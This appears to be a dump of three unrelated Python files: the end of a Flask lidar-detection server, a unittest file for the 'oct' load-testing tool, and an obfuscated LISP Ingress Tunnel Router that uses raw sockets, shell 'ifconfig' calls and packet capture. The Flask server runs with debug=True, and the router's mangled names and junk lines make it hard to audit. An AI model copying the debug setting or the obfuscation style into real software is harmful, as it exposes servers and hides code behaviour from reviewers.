buffer_size=args["o3m_buffer_size"],
)
),
}[args["source"]]()
lidar_type = {
"disk": "velodyne",
"velodyne": "velodyne",
"rplidar": "rplidar",
"o3mlidar": "o3mlidar",
}[args["source"]]
algorithm = {"voxel": voxel_object_detection_3d}[args["algorithm"]]
# start a thread that will perform detection
t = threading.Thread(
target=algorithm, args=(args["model_config"], args["model_name"])
)
t.daemon = True
t.start()
# start the flask app
app.run(
host=args["ip"],
port=args["port"],
debug=True,
threaded=True,
use_reloader=False,
)
|
test_hq.py
|
import os
import sys
import unittest
import shutil
import json
from multiprocessing import Process
from oct_turrets.turret import Turret
from oct_turrets.utils import load_file, validate_conf
from oct.utilities.run import run
from oct.utilities.commands import main
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
def run_turret():
"""Run a simple turret for testing the hq
"""
module = load_file(os.path.join(BASE_DIR, 'fixtures', 'v_user.py'))
config = validate_conf(os.path.join(BASE_DIR, 'fixtures', 'turret_config.json'))
turret = Turret(config, module)
turret.start()
def run_bad_turret():
module = load_file(os.path.join(BASE_DIR, 'fixtures', 'bad_user.py'))
config = validate_conf(os.path.join(BASE_DIR, 'fixtures', 'turret_config.json'))
turret = Turret(config, module)
turret.start()
class CmdOpts(object):
def __init__(self):
self.project_path = '/tmp/oct-test'
self.publisher_channel = None
self.no_results = False
class HQTest(unittest.TestCase):
def setUp(self):
self.turret = Process(target=run_turret)
self.turret.start()
self.bad_turret = Process(target=run_bad_turret)
self.bad_turret.start()
sys.argv = sys.argv[:1]
sys.argv += ["new-project", "/tmp/oct-test"]
main()
# update the runtime for the project
with open(os.path.join(BASE_DIR, 'fixtures', 'config.json')) as f:
data = json.load(f)
with open(os.path.join('/tmp/oct-test', 'config.json'), 'w') as f:
json.dump(data, f)
def test_run_hq(self):
"""Test hq
"""
run(CmdOpts())
def test_run_argparse(self):
"""Test runing hq with command line arguments
"""
sys.argv = sys.argv[:1]
opts = CmdOpts()
sys.argv += ["run", opts.project_path, "--with-forwarder"]
main()
def test_create_errors(self):
"""Test errors when creating project
"""
with self.assertRaises(OSError):
sys.argv = sys.argv[:1]
sys.argv += ["new-project", "/tmp/"]
main()
def tearDown(self):
shutil.rmtree('/tmp/oct-test')
self.turret.terminate()
self.bad_turret.terminate()
if os.path.isfile('/tmp/results.sqlite'):
os.remove('/tmp/results.sqlite')
if __name__ == '__main__':
unittest.main()
|
lisp-itr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
from future import standard_library
standard_library . install_aliases ( )
from builtins import str
from builtins import range
import lisp
import lispconfig
import socket
import select
import threading
import time
import os
from subprocess import getoutput
import struct
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = None
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )
OOo = lisp . lisp_get_ephemeral_port ( )
Ii1IIii11 = None
Oooo0000 = None
i11 = None
I11 = None
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
oo0O000OoO = False
if 34 - 34: I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
i1iIIi1 = threading . Lock ( )
if 50 - 50: i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
def IIiiIiI1 ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "ITR" , [ ] ) )
if 41 - 41: OoOoOO00
if 13 - 13: Oo0Ooo . i11iIiiIii - iIii1I11I1II1 - OoOoOO00
if 6 - 6: I1IiiI / Oo0Ooo % Ii1I
if 84 - 84: i11iIiiIii . o0oOOo0O0Ooo
if 100 - 100: Ii1I - Ii1I - I1Ii111
if 20 - 20: OoooooooOO
if 13 - 13: i1IIi - Ii1I % oO0o / iIii1I11I1II1 % iII111i
def oo ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ITR" ) )
if 68 - 68: I11i + OOooOOo . iIii1I11I1II1 - IiII % iIii1I11I1II1 - ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
def I1i1iii ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "ITR" ) )
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
def oo0 ( lisp_sockets , lisp_ephem_port ) :
lisp . lisp_set_exception ( )
if 57 - 57: OOooOOo . OOooOOo
if 95 - 95: O0 + OoO0O00 . II111iiii / O0
if 97 - 97: ooOoO0o - OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - OoooooooOO
if 59 - 59: O0 + I1IiiI + IiII % I1IiiI
for o0OOoo0OO0OOO in list ( lisp . lisp_crypto_keys_by_nonce . values ( ) ) :
for iI1iI1I1i1I in o0OOoo0OO0OOO : del ( iI1iI1I1i1I )
if 24 - 24: I1ii11iIi11i
lisp . lisp_crypto_keys_by_nonce = { }
if 56 - 56: ooOoO0o
if 92 - 92: iII111i . I11i + o0oOOo0O0Ooo
if 28 - 28: i1IIi * Oo0Ooo - o0oOOo0O0Ooo * IiII * Ii1I / OoO0O00
if 94 - 94: II111iiii % I1ii11iIi11i / OoOoOO00 * iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
if ( lisp . lisp_l2_overlay ) :
O0o0 = lisp . LISP_AFI_MAC
OO00Oo = lisp . lisp_default_iid
O0OOO0OOoO0O = lisp . lisp_address ( O0o0 , "0000-0000-0000" , 0 , OO00Oo )
O0OOO0OOoO0O . mask_len = 0
O00Oo000ooO0 = lisp . lisp_address ( O0o0 , "ffff-ffff-ffff" , 48 , OO00Oo )
lisp . lisp_send_map_request ( lisp_sockets , lisp_ephem_port , O0OOO0OOoO0O , O00Oo000ooO0 , None )
if 100 - 100: O0 + IiII - OOooOOo + i11iIiiIii * Ii1I
if 30 - 30: o0oOOo0O0Ooo . Ii1I - OoooooooOO
if 8 - 8: i1IIi - iIii1I11I1II1 * II111iiii + i11iIiiIii / I1Ii111 % OOooOOo
if 16 - 16: I1ii11iIi11i + OoO0O00 - II111iiii
if 85 - 85: OoOoOO00 + i1IIi
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 58 - 58: II111iiii * OOooOOo * I1ii11iIi11i / OOooOOo
if 75 - 75: oO0o
if 50 - 50: Ii1I / Oo0Ooo - oO0o - I11i % iII111i - oO0o
if 91 - 91: OoO0O00 / I11i - II111iiii . I11i
i11 = threading . Timer ( 60 , oo0 ,
[ lisp_sockets , lisp_ephem_port ] )
i11 . start ( )
return
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
def OO0oOoOO0oOO0 ( lisp_socket ) :
lisp . lisp_set_exception ( )
if 86 - 86: OOooOOo
OOoo0O = lisp . lisp_get_timestamp ( )
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . dynamic_eid_configured ( ) == False ) : continue
if 22 - 22: iIii1I11I1II1 / i11iIiiIii * iIii1I11I1II1 * II111iiii . OOooOOo / i11iIiiIii
Iiii = [ ]
for OO0OoO0o00 in list ( Oo0ooOo0o . dynamic_eids . values ( ) ) :
ooOO0O0ooOooO = OO0OoO0o00 . last_packet
if ( ooOO0O0ooOooO == None ) : continue
if ( ooOO0O0ooOooO + OO0OoO0o00 . timeout > OOoo0O ) : continue
if 55 - 55: o0oOOo0O0Ooo * OoOoOO00
if 61 - 61: I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if ( lisp . lisp_program_hardware ) :
IIIIiiII111 = OO0OoO0o00 . dynamic_eid . print_prefix_no_iid ( )
if ( lisp . lisp_arista_is_alive ( IIIIiiII111 ) ) :
lisp . lprint ( ( "Hardware indicates dynamic-EID {} " + "still active" ) . format ( lisp . green ( IIIIiiII111 , False ) ) )
if 97 - 97: I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
continue
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
oOOo0oOo0 = OO0OoO0o00 . dynamic_eid . print_address ( )
II = "learn%{}%None" . format ( oOOo0oOo0 )
II = lisp . lisp_command_ipc ( II , "lisp-itr" )
lisp . lisp_ipc ( II , lisp_socket , "lisp-etr" )
if 60 - 60: I1IiiI
lisp . lprint ( "Dynamic-EID {}" . format ( lisp . bold ( lisp . green ( oOOo0oOo0 , False ) + " activity timeout" ,
# II111iiii . I1IiiI
False ) ) )
Iiii . append ( oOOo0oOo0 )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
for oOOo0oOo0 in Iiii : Oo0ooOo0o . dynamic_eids . pop ( oOOo0oOo0 )
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ lisp_socket ] ) . start ( )
return
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
def oOooOo0 ( ) :
if ( lisp . lisp_is_macos ( ) ) : return ( [ "en0" , "en1" , "lo0" ] )
if 38 - 38: I1Ii111
if 84 - 84: iIii1I11I1II1 % iII111i / iIii1I11I1II1 % I11i
if 45 - 45: O0
if 26 - 26: I11i - iIii1I11I1II1 - I1IiiI / OoO0O00 . OoOoOO00 % iIii1I11I1II1
OO = "Link encap"
iIiIIi1 = getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if ( iIiIIi1 == "" ) :
OO = ": flags="
iIiIIi1 = getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if 7 - 7: ooOoO0o - Oo0Ooo - oO0o + ooOoO0o
if 26 - 26: Ii1I
iIiIIi1 = iIiIIi1 . split ( "\n" )
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
I1i1Iiiii = [ ]
for OOo0oO00ooO00 in iIiIIi1 :
oOO0O00oO0Ooo = OOo0oO00ooO00 . split ( OO ) [ 0 ] . replace ( " " , "" )
I1i1Iiiii . append ( oOO0O00oO0Ooo )
if 67 - 67: OoO0O00 - OOooOOo
return ( I1i1Iiiii )
if 36 - 36: IiII
if 36 - 36: ooOoO0o / O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
def I111I1Iiii1i ( ) :
global II1iII1i
global oO0oIIII
global Oo0oO0oo0oO00
global i111I
global II1Ii1iI1i
global Ii1IIii11 , Oooo0000
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
lisp . lisp_i_am ( "itr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ITR starting up" )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
II1iII1i [ 0 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV4 )
II1iII1i [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
oO0oIIII = lisp . lisp_open_listen_socket ( "" , "lisp-itr" )
Oo0oO0oo0oO00 = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
II1iII1i [ 2 ] = oO0oIIII
OoOOoOooooOOo = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
i111I = lisp . lisp_open_listen_socket ( OoOOoOooooOOo ,
str ( iiI1iIiI ) )
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
II1Ii1iI1i = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( OOo ) )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
Ii1IIii11 = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
Ii1IIii11 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if ( lisp . lisp_is_raspbian ( ) == False ) :
Oooo0000 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
lisp . lisp_ipc_socket = oO0oIIII
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
threading . Thread ( target = OoOOo0OOoO ) . start ( )
if 72 - 72: Ii1I
if 1 - 1: OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
lisp . lisp_load_checkpoint ( )
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
i11 = threading . Timer ( 60 , oo0 ,
[ II1iII1i , iiI1iIiI ] )
i11 . start ( )
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ oO0oIIII ] ) . start ( )
return ( True )
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
def o0ooooO0o0O ( ) :
iiIi11iI1iii = open ( "./lisp.config" , "r" )
if 67 - 67: O0 / I1Ii111
OOO0000oO = False
iI1i111I1Ii = 0
for i11i1ii1I in iiIi11iI1iii :
if ( i11i1ii1I == "lisp database-mapping {\n" ) : OOO0000oO = True
if ( i11i1ii1I == "}\n" ) : OOO0000oO = False
if ( OOO0000oO == False ) : continue
if ( i11i1ii1I [ 0 ] == " " and i11i1ii1I . find ( "prefix {" ) != - 1 ) : iI1i111I1Ii += 1
if 88 - 88: I11i % I1ii11iIi11i
iiIi11iI1iii . close ( )
return ( iI1i111I1Ii )
if 48 - 48: ooOoO0o / I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / i1IIi
if 92 - 92: Oo0Ooo % Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
def O00oOOooo ( ) :
if 50 - 50: I1ii11iIi11i % O0 * o0oOOo0O0Ooo
if 5 - 5: IiII * OoOoOO00
if 5 - 5: I1Ii111
if 90 - 90: I1Ii111 . ooOoO0o / Ii1I - I11i
if 40 - 40: OoooooooOO
iI1i111I1Ii = o0ooooO0o0O ( )
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
I1IiIiiIiIII = os . getenv ( "LISP_ITR_WAIT_TIME" )
I1IiIiiIiIII = 1 if ( I1IiIiiIiIII == None ) else int ( I1IiIiiIiIII )
if 8 - 8: oO0o / I1ii11iIi11i
if 20 - 20: I1IiiI
if 95 - 95: iII111i - I1IiiI
if 34 - 34: ooOoO0o * I1IiiI . i1IIi * ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
while ( iI1i111I1Ii != len ( lisp . lisp_db_list ) ) :
lisp . lprint ( ( "Waiting {} second(s) for {} database-mapping EID-" + "prefixes, {} processed so far ..." ) . format ( I1IiIiiIiIII , iI1i111I1Ii ,
# I1ii11iIi11i % OoOoOO00 * OoO0O00 % II111iiii
len ( lisp . lisp_db_list ) ) )
time . sleep ( I1IiIiiIiIII )
if 70 - 70: OoO0O00 % oO0o + OOooOOo / Ii1I % O0
if 100 - 100: o0oOOo0O0Ooo + OOooOOo * o0oOOo0O0Ooo
if 80 - 80: o0oOOo0O0Ooo * O0 - Ii1I
if 66 - 66: i11iIiiIii - OOooOOo * Oo0Ooo
if 76 - 76: i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - OoO0O00 - Ii1I + I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 . ooOoO0o + iIii1I11I1II1
oOoOO = [ ]
Ii1i1 = [ ]
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . eid . is_ipv4 ( ) or Oo0ooOo0o . eid . is_ipv6 ( ) or Oo0ooOo0o . eid . is_mac ( ) ) :
oOOo0oOo0 = Oo0ooOo0o . eid . print_prefix_no_iid ( )
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) : Ii1i1 . append ( oOOo0oOo0 )
oOoOO . append ( oOOo0oOo0 )
if 65 - 65: ooOoO0o . OoooooooOO / I1ii11iIi11i . i1IIi * OoO0O00
if 19 - 19: i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
return ( oOoOO , Ii1i1 )
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
def OoOOo0OOoO ( ) :
global i1iIIi1
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
lisp . lisp_set_exception ( )
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
oOoOO , Ii1i1 = O00oOOooo ( )
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
if 5 - 5: Ii1I
if 46 - 46: IiII
ii1iIi1iIiI1i = None
if ( lisp . lisp_ipc_data_plane ) :
lisp . lprint ( lisp . bold ( "Data-plane packet capture disabled" , False ) )
ii1iIi1iIiI1i = "(udp src port 4342 and ip[28] == 0x28)" + " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 40 - 40: i1IIi % OOooOOo
if 71 - 71: OoOoOO00
lisp . lprint ( "Control-plane capture: '{}'" . format ( ii1iIi1iIiI1i ) )
else :
lisp . lprint ( "Capturing packets for source-EIDs {}" . format ( lisp . green ( str ( oOoOO ) , False ) ) )
if 14 - 14: i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if ( lisp . lisp_pitr ) : lisp . lprint ( "Configured for PITR functionality" )
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
i1 = lisp . lisp_l2_overlay
if ( i1 == False ) :
if ( lisp . lisp_is_linux ( ) ) : OO0oOOoo ( oOoOO , Ii1i1 )
if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if ( ii1iIi1iIiI1i == None ) :
if ( lisp . lisp_pitr ) :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , [ ] , False , True )
else :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , Ii1i1 , i1 ,
False )
if 57 - 57: OoOoOO00 - I1ii11iIi11i
else :
i1I11IiI1iiII = ii1iIi1iIiI1i
if 50 - 50: I1Ii111 / i1IIi % OoO0O00 . I1IiiI / iII111i
if 88 - 88: OOooOOo . I11i * o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . I11i
if 10 - 10: o0oOOo0O0Ooo * Oo0Ooo % O0 * iIii1I11I1II1 . O0 % I1ii11iIi11i
if 44 - 44: II111iiii / iII111i / I11i % II111iiii / i1IIi . Ii1I
if 59 - 59: OoooooooOO
iIiIIi1 = oOooOo0 ( )
i1iiiii1 = os . getenv ( "LISP_PCAP_LIST" )
if ( i1iiiii1 == None ) :
O0iII1 = ""
IIII1i = [ ]
else :
Ii1IIIIi1ii1I = list ( set ( i1iiiii1 . split ( ) ) & set ( iIiIIi1 ) )
IIII1i = list ( set ( i1iiiii1 . split ( ) ) ^ set ( iIiIIi1 ) )
O0iII1 = "user-selected "
